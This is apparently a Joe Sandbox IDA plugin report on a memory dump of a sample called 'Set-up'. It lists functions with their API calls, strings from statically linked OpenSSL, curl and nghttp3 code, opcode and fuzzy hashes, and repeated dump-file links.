Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: b3453364223a60793b452a546651b9969ddf000797f443ab48d2818fbe9257dc
Instruction ID: a384b32fa94781134f35ffdbf17595d55419a9a7b4978307476771de7922c9b3
Opcode Fuzzy Hash: b3453364223a60793b452a546651b9969ddf000797f443ab48d2818fbe9257dc
Instruction Fuzzy Hash: FE221F769087419FD701DF24D881BABB7E0BFD6344F088A1DF89597282EB34E944CB92

Function 00B84780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00B847A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B847C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B84800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B84D16

Strings

xn--, xrefs: 00B849D3
H, xrefs: 00B84A88

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: e54cbed764593478324e0646d371fcb77e80c6aad32b5162455b2313903793cb
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: 8EE138316087168FD718EE28D8C072AB7D2EBD4314F198ABDE996873A1E774DC05C742

Function 00B0C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B0C090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00B0C0BE

Strings

assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00B0C433
crypto/evp/encode.c, xrefs: 00B0C42E
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00B0C0D2, 00B0C266
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00B0C0CD, 00B0C26B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: a38336e28f24b565dfe42402475c94e229fbbc2d108d1e5db5ec93eea459272e
Instruction ID: 116d18d196840d6b88d755bbd591011fe0c60e486654dd6ef9f82832b9831810
Opcode Fuzzy Hash: a38336e28f24b565dfe42402475c94e229fbbc2d108d1e5db5ec93eea459272e
Instruction Fuzzy Hash: 63C1E67560C3958FC7159F28C49062ABFE1EF9A304F098AADE8D58B382D335E905CB52

Function 00962430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00964F5D
@, xrefs: 00964EA7
@, xrefs: 00964DB4
ssl/quic/quic_txp.c, xrefs: 00962A29, 00963096, 00963477, 0096357D, 00963FDE, 00964101

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: a0ef4750f0535282eb3a37b0a0b4e8711c2f7d66a8eba85de4731caae7ebced4
Instruction ID: 1769327d855cf6fac8052c0aa4e369aa316255f1009093e186c9117733f02318
Opcode Fuzzy Hash: a0ef4750f0535282eb3a37b0a0b4e8711c2f7d66a8eba85de4731caae7ebced4
Instruction Fuzzy Hash: C053D271A087419FD724CF28C880BABB7E5BFC5314F15892DE8998B391E775E944CB82

Function 00866210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

default, xrefs: 00866471
login, xrefs: 008664FF
machine, xrefs: 00866456, 00866656
macdef, xrefs: 0086643B
password, xrefs: 008665C6
netrc.c, xrefs: 00866243, 00866541, 0086655C, 00866609, 00866627, 008666DD, 008666F7, 0086670E, 0086673F, 0086676B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 1828b86f9be6a0a1ca4c7d8094b007cc187483b5e87f39a18c7361d5d605e885
Instruction ID: e08fc5b4e144d51a9f28df797a393af7f314c10af94da068d4f55d03d8c928bd
Opcode Fuzzy Hash: 1828b86f9be6a0a1ca4c7d8094b007cc187483b5e87f39a18c7361d5d605e885
Instruction Fuzzy Hash: DCE1F2709083859BE3218E24D98676BBBD4FF95708F19082CF885D7382F7B599688793

Function 00B548A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

BQ`, xrefs: 00B54F64

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: BQ`
API String ID: 0-1649249777
Opcode ID: 29eb982b273fd2cfa90a3d1341cdf9a2583fb26e655bcce34cce8a734e72694e
Instruction ID: 7589b1a0bcaaebdaebe58fa8a08f419657ba786a5b480a335420d486310e1982
Opcode Fuzzy Hash: 29eb982b273fd2cfa90a3d1341cdf9a2583fb26e655bcce34cce8a734e72694e
Instruction Fuzzy Hash: 5DA2CF71A08B169FC718CF29C490769F7E1FF88316F1586ADD9A987781D334E8A5CB80

Function 009700F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,009F2212,00000000,00000000), ref: 00970109

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

a2d_ASN1_OBJECT, xrefs: 00970128, 0097014A, 009705BD
crypto/asn1/a_object.c, xrefs: 0097012F, 00970151, 0097039E, 009703B4, 009705C3, 009705FC, 0097062C
1, xrefs: 00970328

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 44ef087ade5eab977c5c087928e7d225aa726bf2a8e2d98755f4e12f3233c806
Instruction ID: 079a8b13a01379a5ba67bebc365f5ab7772ba8e689c060f35b9a921f95d42521
Opcode Fuzzy Hash: 44ef087ade5eab977c5c087928e7d225aa726bf2a8e2d98755f4e12f3233c806
Instruction Fuzzy Hash: C1E1027290C301DBD721AA28C88172EB7E5AFD1754F04CB2DF9DCA7292E775D9448B82

Function 008AE070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,008AC1CE,?,00000003,?), ref: 008AE4EE

Strings

(size_t)(p - buf->last) == len, xrefs: 008AE4E9
nghttp3_qpack.c, xrefs: 008AE4E4

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: 978277b8278db3f761ce36182ae274799850d54728b3a66c1c64bed8dbfec0f4
Instruction ID: e5c9ce47ddddf067418dc5a8078e6e16debe261d93743270af16132f06085b84
Opcode Fuzzy Hash: 978277b8278db3f761ce36182ae274799850d54728b3a66c1c64bed8dbfec0f4
Instruction Fuzzy Hash: BCE10532B042145BE7189E2CC890769B7D7FBDA310F298A3CE9A9C77C1E635DC488795

Function 00A6E5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00A6E5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00A6E67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00A7003E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 0b872ac8fce49b2298d266c6e37586f0cc7c3ebead7bcd650dd619a9a9a0812f
Instruction ID: 8e677a6024977594c06fef201431e7bd09798d3d31b858194cecafa9b086bd69
Opcode Fuzzy Hash: 0b872ac8fce49b2298d266c6e37586f0cc7c3ebead7bcd650dd619a9a9a0812f
Instruction Fuzzy Hash: A7D24FAAC39B9541E313A63D68122E6E7506FFB184F51E72BFCD470E52EF21B2844319

Function 00B7E940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON

Download Yara Rule

Strings

`, xrefs: 00B7FE82
`, xrefs: 00B7F8D3
4, xrefs: 00B7EA6D

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: 4$`$`
API String ID: 0-1230936812
Opcode ID: c9faf3a73ff776874146059d2c803ed6fef6c4d686a578494d3ee3b224d6b33c
Instruction ID: 2aae3e59567bd59a07ecfe279334de022c6fbbe0f2b1ecd6d3e0aef5abc7a8a8
Opcode Fuzzy Hash: c9faf3a73ff776874146059d2c803ed6fef6c4d686a578494d3ee3b224d6b33c
Instruction Fuzzy Hash: 64B29E729087928FD725CF18C8806AAB7E1FFC9304F15CB6DE8A997356D730A945CB42

Function 00B762D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 00B7692B
, xrefs: 00B769F8
, xrefs: 00B76AA6

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 4c6e78d36d875bc27048876352c35e8b0e97398463f45dafe1b4e3fc23a1b186
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: D262E0759087918FC324CF29C48066AFBE1BFC9310F158A6EE9E993351E734A945CF92

Function 009224A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

ssl/quic/quic_record_shared.c, xrefs: 00922524, 009225A8, 00922752, 009227EB
quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 00922680
ossl_qrl_enc_level_set_provide_secret, xrefs: 0092251A, 0092259E, 00922748, 009227E1

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: 2e4aef176d89db81af443484594ec084eb53091f84536840c1ec9c3bd70c4378
Instruction ID: e5e396ead0fb87ef3c9e818498b136614034699cb8625c0f2b215f7897803e99
Opcode Fuzzy Hash: 2e4aef176d89db81af443484594ec084eb53091f84536840c1ec9c3bd70c4378
Instruction Fuzzy Hash: 4BD13775608351ABE7309F54ED42F6BB7E9AFC4304F04482CF9895B286E675E848CB62

Function 00B70560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
